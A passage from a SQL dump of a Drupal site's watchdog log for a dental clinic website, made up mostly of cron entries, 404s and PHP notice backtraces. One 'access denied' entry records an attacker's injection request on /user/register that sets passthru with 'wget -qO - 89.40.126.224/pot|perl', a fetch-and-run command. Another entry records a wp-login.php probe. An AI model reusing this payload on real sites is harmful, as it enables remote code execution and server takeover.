/var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#19 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_html.html.twig_cjUHFHRJkpWCXgLoPgc5zGUoc/c49o6mnFasdsRxPH5Y6XYvTtxG38ptuI50UyROKfTlk.php(102): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#20 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_9650c7423b11bd4e2baf76031247c420951f1e9778d2e3424fee15124d6da689->doDisplay(Array, Array)\n#21 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#22 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#23 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#24 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#25 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'html\', Array)\n#26 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#27 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(147): Drupal\\Core\\Render\\Renderer->render(Array)\n#28 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->Drupal\\Core\\Render\\MainContent\\{closure}()\n#29 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(148): Drupal\\Core\\Render\\Renderer->executeInRenderContext(Object(Drupal\\Core\\Render\\RenderContext), Object(Closure))\n#30 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->renderResponse(Array, Object(Symfony\\Component\\HttpFoundation\\Request), Object(Drupal\\Core\\Routing\\CurrentRouteMatch))\n#31 [internal function]: Drupal\\Core\\EventSubscriber\\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#32 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#33 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.view\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent))\n#34 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\\Component\\HttpKernel\\HttpKernel->handleRaw(Object(Symfony\\Component\\HttpFoundation\\Request), 2)\n#35 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#36 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#37 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#38 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#39 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#40 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#41 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2, true)\n#42 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/DefaultExceptionHtmlSubscriber.php(166): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 2)\n#43 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/DefaultExceptionHtmlSubscriber.php(112): Drupal\\Core\\EventSubscriber\\DefaultExceptionHtmlSubscriber->makeSubrequest(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'/system/403\', 403)\n#44 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/HttpExceptionSubscriberBase.php(109): Drupal\\Core\\EventSubscriber\\DefaultExceptionHtmlSubscriber->on403(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent))\n#45 [internal function]: Drupal\\Core\\EventSubscriber\\HttpExceptionSubscriberBase->onException(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'kernel.exceptio...\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#46 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent), \'kernel.exceptio...\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#47 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(228): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.exceptio...\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForExceptionEvent))\n#48 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(79): Symfony\\Component\\HttpKernel\\HttpKernel->handleException(Object(Symfony\\Component\\HttpKernel\\Exception\\AccessDeniedHttpException), Object(Symfony\\Component\\HttpFoundation\\Request), 1)\n#49 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#50 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#51 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#52 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#53 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#54 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#55 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#56 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/DrupalKernel.php(693): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#57 /var/www/html/clidentcastelo_stg/public/index.php(20): Drupal\\Core\\DrupalKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request))\n#58 {main}\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580311778),(4523,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:78:\"/ms/ms/clinica-dentaria-do-castelo-localizacao-4700-311-braga/ms-90047454-p-3/\";}',4,'','http://www.clidentcastelo.pt/ms/ms/clinica-dentaria-do-castelo-localizacao-4700-311-braga/ms-90047454-p-3/','','54.36.150.130',1580322497),(4524,0,'cron','Starting execution of @module_cron().',_binary 'a:1:{s:7:\"@module\";s:7:\"comment\";}',5,'','http://www.clidentcastelo.pt/ms/ms/clinica-dentaria-do-castelo-localizacao-4700-311-braga/ms-90047454-p-3/','','54.36.150.130',1580322497),(4525,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"dblog\";s:16:\"@module_previous\";s:7:\"comment\";s:5:\"@time\";s:7:\"16.79ms\";}',5,'','http://www.clidentcastelo.pt/ms/ms/clinica-dentaria-do-castelo-localizacao-4700-311-braga/ms-90047454-p-3/','','54.36.150.130',1580322497),(4526,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"field\";s:16:\"@module_previous\";s:5:\"dblog\";s:5:\"@time\";s:7:\"35.33ms\";}',5,'','http://www.clidentcastelo.pt/ms/ms/clinica-dentaria-do-castelo-localizacao-4700-311-braga/ms-90047454-p-3/','','54.36.150.130',1580322497),(4527,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"file\";s:16:\"@module_previous\";s:5:\"field\";s:5:\"@time\";s:6:\"44.4ms\";}',5,'','http://www.clidentcastelo.pt/ms/ms/clinica-dentaria-do-castelo-localizacao-4700-311-braga/ms-90047454-p-3/','','54.36.150.130',1580322497),(4528,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:7:\"history\";s:16:\"@module_previous\";s:4:\"file\";s:5:\"@time\";s:7:\"22.39ms\";}',5,'','http://www.clidentcastelo.pt/ms/ms/clinica-dentaria-do-castelo-localizacao-4700-311-braga/ms-90047454-p-3/','','54.36.150.130',1580322497),(4529,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:8:\"honeypot\";s:16:\"@module_previous\";s:7:\"history\";s:5:\"@time\";s:6:\"2.43ms\";}',5,'','http://www.clidentcastelo.pt/ms/ms/clinica-dentaria-do-castelo-localizacao-4700-311-braga/ms-90047454-p-3/','','54.36.150.130',1580322497),(4530,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"locale\";s:16:\"@module_previous\";s:8:\"honeypot\";s:5:\"@time\";s:6:\"3.59ms\";}',5,'','http://www.clidentcastelo.pt/ms/ms/clinica-dentaria-do-castelo-localizacao-4700-311-braga/ms-90047454-p-3/','','54.36.150.130',1580322497),(4531,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"node\";s:16:\"@module_previous\";s:6:\"locale\";s:5:\"@time\";s:6:\"0.78ms\";}',5,'','http://www.clidentcastelo.pt/ms/ms/clinica-dentaria-do-castelo-localizacao-4700-311-braga/ms-90047454-p-3/','','54.36.150.130',1580322497),(4532,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"search\";s:16:\"@module_previous\";s:4:\"node\";s:5:\"@time\";s:7:\"13.43ms\";}',5,'','http://www.clidentcastelo.pt/ms/ms/clinica-dentaria-do-castelo-localizacao-4700-311-braga/ms-90047454-p-3/','','54.36.150.130',1580322497),(4533,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"system\";s:16:\"@module_previous\";s:6:\"search\";s:5:\"@time\";s:7:\"30.04ms\";}',5,'','http://www.clidentcastelo.pt/ms/ms/clinica-dentaria-do-castelo-localizacao-4700-311-braga/ms-90047454-p-3/','','54.36.150.130',1580322497),(4534,0,'cron','Execution of @module_previous_cron() took @time.',_binary 'a:2:{s:16:\"@module_previous\";s:6:\"system\";s:5:\"@time\";s:7:\"74.25ms\";}',5,'','http://www.clidentcastelo.pt/ms/ms/clinica-dentaria-do-castelo-localizacao-4700-311-braga/ms-90047454-p-3/','','54.36.150.130',1580322497),(4535,0,'cron','Cron run completed.',_binary 'a:0:{}',5,'','http://www.clidentcastelo.pt/ms/ms/clinica-dentaria-do-castelo-localizacao-4700-311-braga/ms-90047454-p-3/','','54.36.150.130',1580322497),(4536,0,'cron','Starting execution of @module_cron().',_binary 'a:1:{s:7:\"@module\";s:7:\"comment\";}',5,'','http://clidentcastelo.pt/?fbclid=IwAR26bqb0t67EY6bFhjvvmC6rUoYJHWrMroGPomZ8MHh--ttrUQJC1jhxL2E','','69.171.251.9',1580346838),(4537,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"dblog\";s:16:\"@module_previous\";s:7:\"comment\";s:5:\"@time\";s:7:\"11.65ms\";}',5,'','http://clidentcastelo.pt/?fbclid=IwAR26bqb0t67EY6bFhjvvmC6rUoYJHWrMroGPomZ8MHh--ttrUQJC1jhxL2E','','69.171.251.9',1580346838),(4538,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"field\";s:16:\"@module_previous\";s:5:\"dblog\";s:5:\"@time\";s:7:\"11.91ms\";}',5,'','http://clidentcastelo.pt/?fbclid=IwAR26bqb0t67EY6bFhjvvmC6rUoYJHWrMroGPomZ8MHh--ttrUQJC1jhxL2E','','69.171.251.9',1580346838),(4539,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"file\";s:16:\"@module_previous\";s:5:\"field\";s:5:\"@time\";s:6:\"2.86ms\";}',5,'','http://clidentcastelo.pt/?fbclid=IwAR26bqb0t67EY6bFhjvvmC6rUoYJHWrMroGPomZ8MHh--ttrUQJC1jhxL2E','','69.171.251.9',1580346838),(4540,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:7:\"history\";s:16:\"@module_previous\";s:4:\"file\";s:5:\"@time\";s:7:\"11.44ms\";}',5,'','http://clidentcastelo.pt/?fbclid=IwAR26bqb0t67EY6bFhjvvmC6rUoYJHWrMroGPomZ8MHh--ttrUQJC1jhxL2E','','69.171.251.9',1580346838),(4541,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:8:\"honeypot\";s:16:\"@module_previous\";s:7:\"history\";s:5:\"@time\";s:6:\"2.43ms\";}',5,'','http://clidentcastelo.pt/?fbclid=IwAR26bqb0t67EY6bFhjvvmC6rUoYJHWrMroGPomZ8MHh--ttrUQJC1jhxL2E','','69.171.251.9',1580346838),(4542,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"locale\";s:16:\"@module_previous\";s:8:\"honeypot\";s:5:\"@time\";s:6:\"2.85ms\";}',5,'','http://clidentcastelo.pt/?fbclid=IwAR26bqb0t67EY6bFhjvvmC6rUoYJHWrMroGPomZ8MHh--ttrUQJC1jhxL2E','','69.171.251.9',1580346838),(4543,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"node\";s:16:\"@module_previous\";s:6:\"locale\";s:5:\"@time\";s:6:\"0.67ms\";}',5,'','http://clidentcastelo.pt/?fbclid=IwAR26bqb0t67EY6bFhjvvmC6rUoYJHWrMroGPomZ8MHh--ttrUQJC1jhxL2E','','69.171.251.9',1580346838),(4544,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"search\";s:16:\"@module_previous\";s:4:\"node\";s:5:\"@time\";s:6:\"7.13ms\";}',5,'','http://clidentcastelo.pt/?fbclid=IwAR26bqb0t67EY6bFhjvvmC6rUoYJHWrMroGPomZ8MHh--ttrUQJC1jhxL2E','','69.171.251.9',1580346838),(4545,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"system\";s:16:\"@module_previous\";s:6:\"search\";s:5:\"@time\";s:7:\"23.58ms\";}',5,'','http://clidentcastelo.pt/?fbclid=IwAR26bqb0t67EY6bFhjvvmC6rUoYJHWrMroGPomZ8MHh--ttrUQJC1jhxL2E','','69.171.251.9',1580346838),(4546,0,'cron','Execution of @module_previous_cron() took @time.',_binary 'a:2:{s:16:\"@module_previous\";s:6:\"system\";s:5:\"@time\";s:7:\"97.39ms\";}',5,'','http://clidentcastelo.pt/?fbclid=IwAR26bqb0t67EY6bFhjvvmC6rUoYJHWrMroGPomZ8MHh--ttrUQJC1jhxL2E','','69.171.251.9',1580346839),(4547,0,'cron','Cron run completed.',_binary 'a:0:{}',5,'','http://clidentcastelo.pt/?fbclid=IwAR26bqb0t67EY6bFhjvvmC6rUoYJHWrMroGPomZ8MHh--ttrUQJC1jhxL2E','','69.171.251.9',1580346839),(4548,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:13:\"/wp-login.php\";}',4,'','http://clidentcastelo.pt/wp-login.php','','122.51.42.128',1580377000),(4549,0,'cron','Starting execution of @module_cron().',_binary 'a:1:{s:7:\"@module\";s:7:\"comment\";}',5,'','http://clidentcastelo.pt/wp-login.php','','122.51.42.128',1580377001),(4550,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"dblog\";s:16:\"@module_previous\";s:7:\"comment\";s:5:\"@time\";s:7:\"11.38ms\";}',5,'','http://clidentcastelo.pt/wp-login.php','','122.51.42.128',1580377001),(4551,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"field\";s:16:\"@module_previous\";s:5:\"dblog\";s:5:\"@time\";s:7:\"11.88ms\";}',5,'','http://clidentcastelo.pt/wp-login.php','','122.51.42.128',1580377001),(4552,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"file\";s:16:\"@module_previous\";s:5:\"field\";s:5:\"@time\";s:6:\"3.23ms\";}',5,'','http://clidentcastelo.pt/wp-login.php','','122.51.42.128',1580377001),(4553,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:7:\"history\";s:16:\"@module_previous\";s:4:\"file\";s:5:\"@time\";s:7:\"82.58ms\";}',5,'','http://clidentcastelo.pt/wp-login.php','','122.51.42.128',1580377001),(4554,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:8:\"honeypot\";s:16:\"@module_previous\";s:7:\"history\";s:5:\"@time\";s:6:\"1.81ms\";}',5,'','http://clidentcastelo.pt/wp-login.php','','122.51.42.128',1580377001),(4555,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"locale\";s:16:\"@module_previous\";s:8:\"honeypot\";s:5:\"@time\";s:5:\"7.6ms\";}',5,'','http://clidentcastelo.pt/wp-login.php','','122.51.42.128',1580377001),(4556,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"node\";s:16:\"@module_previous\";s:6:\"locale\";s:5:\"@time\";s:6:\"7.94ms\";}',5,'','http://clidentcastelo.pt/wp-login.php','','122.51.42.128',1580377001),(4557,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"search\";s:16:\"@module_previous\";s:4:\"node\";s:5:\"@time\";s:6:\"80.2ms\";}',5,'','http://clidentcastelo.pt/wp-login.php','','122.51.42.128',1580377001),(4558,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"system\";s:16:\"@module_previous\";s:6:\"search\";s:5:\"@time\";s:8:\"400.82ms\";}',5,'','http://clidentcastelo.pt/wp-login.php','','122.51.42.128',1580377001),(4559,0,'cron','Execution of @module_previous_cron() took @time.',_binary 'a:2:{s:16:\"@module_previous\";s:6:\"system\";s:5:\"@time\";s:6:\"56.9ms\";}',5,'','http://clidentcastelo.pt/wp-login.php','','122.51.42.128',1580377001),(4560,0,'cron','Cron run completed.',_binary 'a:0:{}',5,'','http://clidentcastelo.pt/wp-login.php','','122.51.42.128',1580377001),(4561,0,'access denied','@uri',_binary 'a:1:{s:4:\"@uri\";s:156:\"/user/register/?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23markup%5D=wget+-qO+-+89.40.126.224%2Fpot%7Cperl&name%5B%23type%5D=markup\";}',4,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580377016),(4562,0,'php','%type: @message in %function (line %line of %file) @backtrace_string.',_binary 'a:6:{s:5:\"%type\";s:6:\"Notice\";s:8:\"@message\";O:25:\"Drupal\\Core\\Render\\Markup\":1:{s:9:\"\0*\0string\";s:44:\"Only variables should be passed by reference\";}s:9:\"%function\";s:50:\"Drupal\\support\\Plugin\\Block\\ServicesBlock->build()\";s:5:\"%file\";s:97:\"/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/ServicesBlock.php\";s:5:\"%line\";i:21;s:17:\"@backtrace_string\";s:11368:\"#0 /var/www/html/clidentcastelo_stg/public/core/includes/bootstrap.inc(587): _drupal_error_handler_real(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#1 /var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/ServicesBlock.php(21): _drupal_error_handler(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#2 /var/www/html/clidentcastelo_stg/public/core/modules/block/src/BlockViewBuilder.php(163): Drupal\\support\\Plugin\\Block\\ServicesBlock->build()\n#3 [internal function]: Drupal\\block\\BlockViewBuilder::preRender(Array)\n#4 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(378): call_user_func(\'Drupal\\\\block\\\\Bl...\', Array)\n#5 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(450): Drupal\\Core\\Render\\Renderer->doRender(Array)\n#6 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#7 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#8 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(357): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#9 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(216): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->block_footer(Array, Array)\n#10 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(98): Twig\\Template->displayBlock(\'footer\', Array, Array)\n#11 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->doDisplay(Array, Array)\n#12 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#13 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#14 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#15 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#16 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'page\', Array)\n#17 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#18 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#19 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_html.html.twig_cjUHFHRJkpWCXgLoPgc5zGUoc/c49o6mnFasdsRxPH5Y6XYvTtxG38ptuI50UyROKfTlk.php(102): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#20 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_9650c7423b11bd4e2baf76031247c420951f1e9778d2e3424fee15124d6da689->doDisplay(Array, Array)\n#21 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#22 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#23 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#24 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#25 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'html\', Array)\n#26 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#27 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(147): Drupal\\Core\\Render\\Renderer->render(Array)\n#28 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->Drupal\\Core\\Render\\MainContent\\{closure}()\n#29 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(148): Drupal\\Core\\Render\\Renderer->executeInRenderContext(Object(Drupal\\Core\\Render\\RenderContext), Object(Closure))\n#30 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->renderResponse(Array, Object(Symfony\\Component\\HttpFoundation\\Request), Object(Drupal\\Core\\Routing\\CurrentRouteMatch))\n#31 [internal function]: Drupal\\Core\\EventSubscriber\\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#32 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#33 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.view\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent))\n#34 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(68): 